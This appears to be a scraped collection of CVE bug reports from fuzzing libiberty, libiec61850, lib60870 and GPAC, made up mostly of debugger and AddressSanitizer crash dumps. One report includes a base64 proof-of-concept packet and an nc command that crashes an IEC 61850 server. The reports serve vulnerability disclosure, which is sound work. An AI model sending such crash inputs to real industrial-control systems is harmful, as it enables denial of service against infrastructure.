──────────────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────────────
In file: /home/aidai/fuzzing/binutils/binutils-gdb/libiberty/rust-demangle.c
   1070             PRINT (", ");
   1071           demangle\_generic\_arg (rdm);
   1072         }
   1073     }
   1074   else
 ► 1075     demangle\_path (rdm, 0);
   1076   return open;
   1077 }
   1078
   1079 static void
   1080 demangle\_dyn\_trait (struct rust\_demangler \*rdm)
──────────────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────────────
00:0000│ rsp 0x7fffff7ff000 ◂— 0x4
01:0008│     0x7fffff7ff008 —▸ 0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f424459 /\* 'YDB\_' \*/
02:0010│     0x7fffff7ff010 ◂— 0x0
03:0018│     0x7fffff7ff018 —▸ 0x55555563faad (demangle\_path\_maybe\_open\_generics+285) ◂— mov    qword ptr \[rbp + 0x20\], rbx
04:0020│     0x7fffff7ff020 ◂— 0x0
05:0028│     0x7fffff7ff028 —▸ 0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f424459 /\* 'YDB\_' \*/
06:0030│     0x7fffff7ff030 ◂— 0x0
07:0038│     0x7fffff7ff038 —▸ 0x55555563fb98 (demangle\_type+216) ◂— mov    rdx, qword ptr \[rbp + 0x20\]
────────────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────────────
 ► f 0   0x55555563f9b3 demangle\_path\_maybe\_open\_generics+35
   f 1   0x55555563faad demangle\_path\_maybe\_open\_generics+285
   f 2   0x55555563fb98 demangle\_type+216
   f 3   0x55555563fb98 demangle\_type+216
   f 4   0x555555640547 demangle\_path+231
   f 5   0x55555563f9b8 demangle\_path\_maybe\_open\_generics+40
   f 6   0x55555563faad demangle\_path\_maybe\_open\_generics+285
   f 7   0x55555563fb98 demangle\_type+216
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
\`\`\`

CVE-2021-46195: 103841 – Uncontrolled Recursion in libiberty/rust-demangle.c

A NULL pointer dereference in AcseConnection_parseMessage at src/mms/iso_acse/acse.c of libiec61850 v1.5.0 can lead to a segmentation fault or application crash.

**NULL Pointer Dereference in AcseConnection\_parseMessage****Description**

A NULL Pointer Dereference was discovered in AcseConnection\_parseMessage at src/mms/iso\_acse/acse.c:429. The vulnerability causes a segmentation fault and application crash.

**version**

8eeb6f0

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**Proof of Concept**

**poc**

    base64 poc
    AwAAFgLwgA0NAQDBATGBAgABogIAAA==
    

**command:**

    ./server_example_basic_io
    nc 0.0.0.0 102 < poc
    

**Result**

    ./server_example_basic_io
    Using libIEC61850 version 1.5.0
    Connection opened
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==4028537==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55de6e46db68 bp 0x7fac36efcaa0 sp 0x7fac36efc9f0 T3)
    ==4028537==The signal is caused by a READ memory access.
    ==4028537==Hint: address points to the zero page.
        #0 0x55de6e46db67 in AcseConnection_parseMessage src/mms/iso_acse/acse.c:429
        #1 0x55de6e41960b in IsoConnection_handleTcpConnection src/mms/iso_server/iso_connection.c:233
        #2 0x55de6e41ac5d in handleTcpConnection src/mms/iso_server/iso_connection.c:472
        #3 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
        #4 0x7fac3b5bb292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV src/mms/iso_acse/acse.c:429 in AcseConnection_parseMessage
    Thread T3 created by T1 here:
        #0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
        #1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
        #2 0x55de6e41b4f7 in IsoConnection_start src/mms/iso_server/iso_connection.c:581
        #3 0x55de6e417bf1 in handleIsoConnections src/mms/iso_server/iso_server.c:520
        #4 0x55de6e417c99 in isoServerThread src/mms/iso_server/iso_server.c:554
        #5 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
    
    Thread T1 created by T0 here:
        #0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
        #1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
        #2 0x55de6e4182d2 in IsoServer_startListening src/mms/iso_server/iso_server.c:682
        #3 0x55de6e3b9b50 in MmsServer_startListening src/mms/iso_mms/server/mms_server.c:606
        #4 0x55de6e3adae9 in IedServer_start src/iec61850/server/impl/ied_server.c:692
        #5 0x55de6e39537e in main /root/disk2/fuzzing/libiec61850/test/libiec61850/examples/server_example_basic_io/server_example_basic_io.c:146
        #6 0x7fac3b4c00b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    ==4028537==ABORTING
    

**gdb**

    Using libIEC61850 version 1.5.0
    [New Thread 0x7ffff3bff700 (LWP 4048010)]
    [New Thread 0x7ffff33fe700 (LWP 4048011)]
    Connection opened
    [New Thread 0x7ffff2bfd700 (LWP 4048307)]
    
    Thread 4 "server_example_" received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 0x7ffff2bfd700 (LWP 4048307)]
    0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at src/mms/iso_acse/acse.c:429
    429         uint8_t messageType = buffer[bufPos++];
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x7ffff2bfca20 ◂— 0x41b58ab3
     RCX  0x0
     RDX  0x0
     RDI  0x7ffff2bfca80 —▸ 0x7ffff2bfce60 ◂— 0x0
     RSI  0x0
     R8   0x0
     R9   0x32
     R10  0x40
     R11  0x0
     R12  0xffffe57f944 ◂— 0x0
     R13  0x7ffff2bfca20 ◂— 0x41b58ab3
     R14  0x7ffff2bfcb40 ◂— 0x41b58ab3
     R15  0x7ffff2bfcf80 ◂— 0x0
     RBP  0x7ffff2bfcaa0 —▸ 0x7ffff2bfce80 —▸ 0x7ffff2bfceb0 ◂— 0x0
     RSP  0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
     RIP  0x555555661b68 (AcseConnection_parseMessage+383) ◂— movzx  eax, byte ptr [rcx]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x555555661b68 <AcseConnection_parseMessage+383>    movzx  eax, byte ptr [rcx]
       0x555555661b6b <AcseConnection_parseMessage+386>    mov    byte ptr [rbp - 0x95], al
       0x555555661b71 <AcseConnection_parseMessage+392>    mov    ecx, dword ptr [rbp - 0x90]
       0x555555661b77 <AcseConnection_parseMessage+398>    mov    edx, dword ptr [rbp - 0x8c]
       0x555555661b7d <AcseConnection_parseMessage+404>    lea    rsi, [rdi - 0x40]
       0x555555661b81 <AcseConnection_parseMessage+408>    mov    rax, qword ptr [rbp - 0x88]
       0x555555661b88 <AcseConnection_parseMessage+415>    mov    rdi, rax
       0x555555661b8b <AcseConnection_parseMessage+418>    call   BerDecoder_decodeLength                <BerDecoder_decodeLength>
    
       0x555555661b90 <AcseConnection_parseMessage+423>    mov    dword ptr [rbp - 0x8c], eax
       0x555555661b96 <AcseConnection_parseMessage+429>    cmp    dword ptr [rbp - 0x8c], 0
       0x555555661b9d <AcseConnection_parseMessage+436>    jns    AcseConnection_parseMessage+448
           <AcseConnection_parseMessage+448>
    ──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
    In file: /root/disk2/fuzzing/libiec61850/test/libiec61850/src/mms/iso_acse/acse.c
       424
       425     int messageSize = message->size;
       426
       427     int bufPos = 0;
       428
     ► 429     uint8_t messageType = buffer[bufPos++];
       430
       431     int len;
       432
       433     bufPos = BerDecoder_decodeLength(buffer, &len, bufPos, messageSize);
       434
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp     0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
    01:0008│         0x7ffff2bfc9f8 —▸ 0x608000004020 ◂— 0x0
    02:0010│         0x7ffff2bfca00 —▸ 0x7ffff2bfcb40 ◂— 0x41b58ab3
    03:0018│         0x7ffff2bfca08 —▸ 0xa2310146 ◂— 0x0
    04:0020│         0x7ffff2bfca10 —▸ 0x100000000 ◂— 0x0
    05:0028│         0x7ffff2bfca18 ◂— 0x0
    06:0030│ rbx r13 0x7ffff2bfca20 ◂— 0x41b58ab3
    07:0038│         0x7ffff2bfca28 —▸ 0x5555556d71d8 ◂— '1 32 4 7 len:431'
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x555555661b68 AcseConnection_parseMessage+383
       f 1   0x55555560d60c IsoConnection_handleTcpConnection+1422
       f 2   0x55555560ec5e handleTcpConnection+43
       f 3   0x7ffff7564609 start_thread+217
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at
     src/mms/iso_acse/acse.c:429
    #1  0x000055555560d60c in IsoConnection_handleTcpConnection (self=0x61100000ff40, isSingleThread=false) at src/mms/iso_server/iso_connection.c:233
    #2  0x000055555560ec5e in handleTcpConnection (parameter=0x61100000ff40) at src/mms/iso_server/iso_connection.c:472
    #3  0x00007ffff7564609 in start_thread (arg=<optimized out>) at pthread_create.c:477
    #4  0x00007ffff733c293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

CVE-2021-45769: NULL Pointer Dereference in AcseConnection_parseMessage · Issue #368 · mz-automation/libiec61850

GPAC 1.1.0 was discovered to contain an invalid memory address dereference via the function lsr_read_id(). This vulnerability can lead to a Denial of Service (DoS).

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

An invalid memory address dereference was discovered in lsr\_read\_id(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-rev1555-g339e7a736-master
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --prefix=/root/fuck_bin/gpac/test
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

**POCs**  
lsr\_read\_id.zip

    tree
    .
    ├── lsr_read_id-lsr_read_a
    │   └── id_000661,sig_11,src_005751,op_havoc,rep_4
    ├── lsr_read_id-lsr_read_animate
    │   ├── id_000623,sig_11,src_005500+003857,op_splice,rep_2
    │   ├── id_000669,sig_11,src_005818,op_havoc,rep_8
    │   └── id_000707,sig_11,src_006355,op_havoc,rep_8
    ├── lsr_read_id-lsr_read_audio.isra
    │   └── id_000539,sig_11,src_004864,op_havoc,rep_8
    ├── lsr_read_id-lsr_read_ellipse
    │   ├── id_000540,sig_11,src_004864,op_havoc,rep_8
    │   └── id_000681,sig_06,src_005943,op_havoc,rep_2
    ├── lsr_read_id-lsr_read_linearGradient
    │   └── id_000407,sig_11,src_004547,op_havoc,rep_2
    ├── lsr_read_id-lsr_read_polygon
    │   ├── id_000424,sig_11,src_004557,op_havoc,rep_4
    │   └── id_000533,sig_06,src_004856+005154,op_splice,rep_4
    ├── lsr_read_id-lsr_read_rect
    │   └── id_000653,sig_06,src_005718+005529,op_splice,rep_2
    └── lsr_read_id-lsr_read_scene_content_model
        ├── id_000457,sig_11,src_004611,op_havoc,rep_2
        └── id_000687,sig_11,src_006098,op_havoc,rep_4
    
    8 directories, 13 files
    

**Result**

The result is omitted here.

**gdb**

The gdb result is omitted here.

CVE-2021-45767: Invalid memory address dereference in lsr_read_id() · Issue #1982 · gpac/gpac

A NULL pointer dereference in CS104_IPAddress_setFromString at src/iec60870/cs104/cs104_slave.c of lib60870 commit 0d5e76e can lead to a segmentation fault or application crash.

**NULL Pointer Dereference in CS104\_IPAddress\_setFromString****Description**

A NULL Pointer Dereference was discovered in CS104\_IPAddress\_setFromString at src/iec60870/cs104/cs104\_slave.c:785. The vulnerability causes a segmentation fault and application crash.

If the ipAddrStr is NULL, strchr() will crash. Should there be a check?

**version**

0d5e76e

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**gdb**

    LD_PRELOAD="/root/tools/preeny-master/build/lib/libdesock.so" ./cs104_redundancy_server
    New connection request from (null)
    [1]    128322 segmentation fault  LD_PRELOAD="/root/tools/preeny-master/build/lib/libdesock.so"
    

    pwndbg>
    0x0000555555568557      785         if (strchr(ipAddrStr, '.') != NULL) {
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x0
     RCX  0x7ffff7e9739b (getpeername+11) ◂— cmp    rax, -0xfff
     RDX  0x0
    *RDI  0x0
     RSI  0x2e
     R8   0x0
     R9   0x23
     R10  0x55555557110e ◂— 0x63656e6e6f43000a /* '\n' */
     R11  0x246
     R12  0x7fffffffde9e ◂— 0x5555555a60600000
     R13  0x7fffffffde9f ◂— 0x5555555a606000
     R14  0x7fffffffdea0 —▸ 0x5555555a6060 ◂— 0x0
     R15  0x7ffff7d6afc0 ◂— 0x0
     RBP  0x7ffff7d6ade0 —▸ 0x7ffff7d6ae40 —▸ 0x7ffff7d6aef0 ◂— 0x0
     RSP  0x7ffff7d6adc0 ◂— 0x0
    *RIP  0x555555568557 (CS104_IPAddress_setFromString+32) ◂— call   0x5555555574e0
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
       0x555555568543 <CS104_IPAddress_setFromString+12>    mov    qword ptr [rbp - 0x18], rdi
       0x555555568547 <CS104_IPAddress_setFromString+16>    mov    qword ptr [rbp - 0x20], rsi
       0x55555556854b <CS104_IPAddress_setFromString+20>    mov    rax, qword ptr [rbp - 0x20]
       0x55555556854f <CS104_IPAddress_setFromString+24>    mov    esi, 0x2e
       0x555555568554 <CS104_IPAddress_setFromString+29>    mov    rdi, rax
     ► 0x555555568557 <CS104_IPAddress_setFromString+32>    call   strchr@plt                <strchr@plt>
            s: 0x0
            c: 0x2e
    
       0x55555556855c <CS104_IPAddress_setFromString+37>    test   rax, rax
       0x55555556855f <CS104_IPAddress_setFromString+40>    je     CS104_IPAddress_setFromString+165                <CS104_IPAddress_setFromString+165>
    
       0x555555568561 <CS104_IPAddress_setFromString+42>    mov    rax, qword ptr [rbp - 0x18]
       0x555555568565 <CS104_IPAddress_setFromString+46>    mov    dword ptr [rax + 0x10], 0
       0x55555556856c <CS104_IPAddress_setFromString+53>    mov    dword ptr [rbp - 0xc], 0
    ──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
    In file: /root/disk2/fuzzing/lib60870/test/lib60870/lib60870-C/src/iec60870/cs104/cs104_slave.c
       780 };
       781
       782 static void
       783 CS104_IPAddress_setFromString(CS104_IPAddress self, const char* ipAddrStr)
       784 {
     ► 785     if (strchr(ipAddrStr, '.') != NULL) {
       786         /* parse IPv4 string */
       787         self->type = IP_ADDRESS_TYPE_IPV4;
       788
       789         int i;
       790
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7ffff7d6adc0 ◂— 0x0
    01:0008│     0x7ffff7d6adc8 —▸ 0x7ffff7d6ae20 —▸ 0x7ffff7d6ae40 —▸ 0x7ffff7d6aef0 ◂— 0x0
    02:0010│     0x7ffff7d6add0 —▸ 0x7ffff0000ef0 ◂— 0x4
    03:0018│     0x7ffff7d6add8 —▸ 0x55555557d2d0 —▸ 0x5555555579ed (interrogationHandler) ◂— endbr64
    04:0020│ rbp 0x7ffff7d6ade0 —▸ 0x7ffff7d6ae40 —▸ 0x7ffff7d6aef0 ◂— 0x0
    05:0028│     0x7ffff7d6ade8 —▸ 0x55555556c0c1 (getMatchingRedundancyGroup+54) ◂— mov    qword ptr [rbp - 0x40], 0
    06:0030│     0x7ffff7d6adf0 ◂— 0x0
    07:0038│     0x7ffff7d6adf8 —▸ 0x55555557d2d0 —▸ 0x5555555579ed (interrogationHandler) ◂— endbr64
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x555555568557 CS104_IPAddress_setFromString+32
       f 1   0x55555556c0c1 getMatchingRedundancyGroup+54
       f 2   0x55555556c64f serverThread+523
       f 3   0x7ffff7f6f609 start_thread+217
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> c
    Continuing.
    
    Thread 2 "cs104_redundanc" received signal SIGSEGV, Segmentation fault.
    __strchr_avx2 () at ../sysdeps/x86_64/multiarch/strchr-avx2.S:57
    57      ../sysdeps/x86_64/multiarch/strchr-avx2.S: No such file or directory.
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x0
    *RCX  0x0
     RDX  0x0
     RDI  0x0
     RSI  0x2e
     R8   0x0
     R9   0x23
     R10  0x55555557110e ◂— 0x63656e6e6f43000a /* '\n' */
     R11  0x246
     R12  0x7fffffffde9e ◂— 0x5555555a60600000
     R13  0x7fffffffde9f ◂— 0x5555555a606000
     R14  0x7fffffffdea0 —▸ 0x5555555a6060 ◂— 0x0
     R15  0x7ffff7d6afc0 ◂— 0x0
     RBP  0x7ffff7d6ade0 —▸ 0x7ffff7d6ae40 —▸ 0x7ffff7d6aef0 ◂— 0x0
    *RSP  0x7ffff7d6adb8 —▸ 0x55555556855c (CS104_IPAddress_setFromString+37) ◂— test   rax, rax
    *RIP  0x7ffff7eff08c (__strchr_avx2+28) ◂— vmovdqu ymm8, ymmword ptr [rdi]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff7eff08c <__strchr_avx2+28>     vmovdqu ymm8, ymmword ptr [rdi]
       0x7ffff7eff090 <__strchr_avx2+32>     vpcmpeqb ymm1, ymm0, ymm8
       0x7ffff7eff095 <__strchr_avx2+37>     vpcmpeqb ymm2, ymm9, ymm8
       0x7ffff7eff09a <__strchr_avx2+42>     vpor   ymm1, ymm2, ymm1
       0x7ffff7eff09e <__strchr_avx2+46>     vpmovmskb eax, ymm1
       0x7ffff7eff0a2 <__strchr_avx2+50>     test   eax, eax
       0x7ffff7eff0a4 <__strchr_avx2+52>     jne    __strchr_avx2+400                <__strchr_avx2+400>
        ↓
       0x7ffff7eff200 <__strchr_avx2+400>    tzcnt  eax, eax
       0x7ffff7eff204 <__strchr_avx2+404>    xor    edx, edx
       0x7ffff7eff206 <__strchr_avx2+406>    lea    rax, [rdi + rax]
       0x7ffff7eff20a <__strchr_avx2+410>    cmp    sil, byte ptr [rax]
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7ffff7d6adb8 —▸ 0x55555556855c (CS104_IPAddress_setFromString+37) ◂— test   rax, rax
    01:0008│     0x7ffff7d6adc0 ◂— 0x0
    02:0010│     0x7ffff7d6adc8 —▸ 0x7ffff7d6ae20 —▸ 0x7ffff7d6ae40 —▸ 0x7ffff7d6aef0 ◂— 0x0
    03:0018│     0x7ffff7d6add0 —▸ 0x7ffff0000ef0 ◂— 0x4
    04:0020│     0x7ffff7d6add8 —▸ 0x55555557d2d0 —▸ 0x5555555579ed (interrogationHandler) ◂— endbr64
    05:0028│ rbp 0x7ffff7d6ade0 —▸ 0x7ffff7d6ae40 —▸ 0x7ffff7d6aef0 ◂— 0x0
    06:0030│     0x7ffff7d6ade8 —▸ 0x55555556c0c1 (getMatchingRedundancyGroup+54) ◂— mov    qword ptr [rbp - 0x40], 0
    07:0038│     0x7ffff7d6adf0 ◂— 0x0
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff7eff08c __strchr_avx2+28
       f 1   0x55555556855c CS104_IPAddress_setFromString+37
       f 2   0x55555556c0c1 getMatchingRedundancyGroup+54
       f 3   0x55555556c64f serverThread+523
       f 4   0x7ffff7f6f609 start_thread+217
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg>

CVE-2021-45773: NULL Pointer Dereference in CS104_IPAddress_setFromString · Issue #100 · mz-automation/lib60870

GPAC v1.1.0 was discovered to contain an invalid memory address dereference via the function shift_chunk_offsets.isra().

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

An invalid memory address dereference was discovered in shift\_chunk\_offsets.isra(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration:
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

poc\_9.zip

**Result**

    [iso file] Unknown box type stbU in parent minf
    [iso file] Track with no sample table !
    [iso file] Track with no sample description box !
    [iso file] Box "trak" is larger than container box
    [iso file] Box "moov" size 256 (start 20) invalid (read 2209)
    [iso file] Unknown top-level box type 079Fmd
    Saving ./poc/poc_9: In-place rewrite
    [1]    2265002 segmentation fault  ./MP4Box -hint ./poc/poc_9
    

**gdb**

    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7981ba3 in shift_chunk_offsets.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ───────────────────────────────[ REGISTERS ]──────────────────────────────── RAX  0x5555555cc6e0 ◂— 0x6d696e66 /* 'fnim' */
     RBX  0x5555555ccfe0 ◂— 0x7374626c /* 'lbts' */
     RCX  0x0
     RDX  0x5555555cf160 ◂— 0x6d646961 /* 'aidm' */
     RDI  0x28
     RSI  0x34
     R8   0x14
     R9   0x0
     R10  0x7ffff775d6fa ◂— 'gf_isom_box_size'
     R11  0x7ffff796bce0 (gf_isom_box_size) ◂— endbr64
     R12  0x5555555c72a0 ◂— 0xffffffec
     R13  0x14
     R14  0x1
     R15  0x7fffffff7e80 ◂— 0x0
     RBP  0x0
     RSP  0x7fffffff7e00 ◂— 0xf7747c68
     RIP  0x7ffff7981ba3 (shift_chunk_offsets.isra+19) ◂— mov    esi, dword ptr [rsi]
    ─────────────────────────────────[ DISASM ]───────────────────────────────── ► 0x7ffff7981ba3 <shift_chunk_offsets.isra+19>     mov    esi, dword ptr [rsi]
       0x7ffff7981ba5 <shift_chunk_offsets.isra+21>     mov    qword ptr [rsp + 8], rdi
       0x7ffff7981baa <shift_chunk_offsets.isra+26>     mov    qword ptr [rsp + 0x10], rdx
       0x7ffff7981baf <shift_chunk_offsets.isra+31>     mov    dword ptr [rsp + 0x2c], r9d
       0x7ffff7981bb4 <shift_chunk_offsets.isra+36>     test   esi, esi
       0x7ffff7981bb6 <shift_chunk_offsets.isra+38>     je     shift_chunk_offsets.isra+175                <shift_chunk_offsets.isra+175>
        ↓
       0x7ffff7981c3f <shift_chunk_offsets.isra+175>    add    rsp, 0x38
       0x7ffff7981c43 <shift_chunk_offsets.isra+179>    xor    eax, eax
       0x7ffff7981c45 <shift_chunk_offsets.isra+181>    pop    rbx
       0x7ffff7981c46 <shift_chunk_offsets.isra+182>    pop    rbp
       0x7ffff7981c47 <shift_chunk_offsets.isra+183>    pop    r12
    ─────────────────────────────────[ STACK ]──────────────────────────────────00:0000│ rsp 0x7fffffff7e00 ◂— 0xf7747c68
    01:0008│     0x7fffffff7e08 ◂— 0x0
    02:0010│     0x7fffffff7e10 ◂— 0x999
    03:0018│     0x7fffffff7e18 ◂— 0x34 /* '4' */
    04:0020│     0x7fffffff7e20 —▸ 0x7ffff7fc7368 —▸ 0x7ffff7ffe450 —▸ 0x7ffff73131e0 —▸ 0x7ffff7ffe190 ◂— ...
    05:0028│     0x7fffffff7e28 —▸ 0x7fffffff7f68 —▸ 0x7ffff7751b48 ◂— 0xe0012000053a2
    06:0030│     0x7fffffff7e30 —▸ 0x7ffff775d6fa ◂— 'gf_isom_box_size'
    07:0038│     0x7fffffff7e38 —▸ 0x5555555ccfe0 ◂— 0x7374626c /* 'lbts' */
    ───────────────────────────────[ BACKTRACE ]──────────────────────────────── ► f 0   0x7ffff7981ba3 shift_chunk_offsets.isra+19
       f 1   0x7ffff7981fd0 inplace_shift_moov_meta_offsets+224
       f 2   0x7ffff7982a5c inplace_shift_mdat+732
       f 3   0x7ffff7986c29 WriteToFile+2713
       f 4   0x7ffff7978042 gf_isom_write+370
       f 5   0x7ffff79780c8 gf_isom_close+24
       f 6   0x55555557ad12 mp4boxMain+7410
       f 7   0x7ffff75630b3 __libc_start_main+243
    ────────────────────────────────────────────────────────────────────────────pwndbg> bt
    #0  0x00007ffff7981ba3 in shift_chunk_offsets.isra () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #1  0x00007ffff7981fd0 in inplace_shift_moov_meta_offsets () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #2  0x00007ffff7982a5c in inplace_shift_mdat () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #3  0x00007ffff7986c29 in WriteToFile () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #4  0x00007ffff7978042 in gf_isom_write () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #5  0x00007ffff79780c8 in gf_isom_close () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #6  0x000055555557ad12 in mp4boxMain ()
    #7  0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at ../csu/libc-start.c:308
    #8  0x000055555556c45e in _start ()

Tag

#ubuntu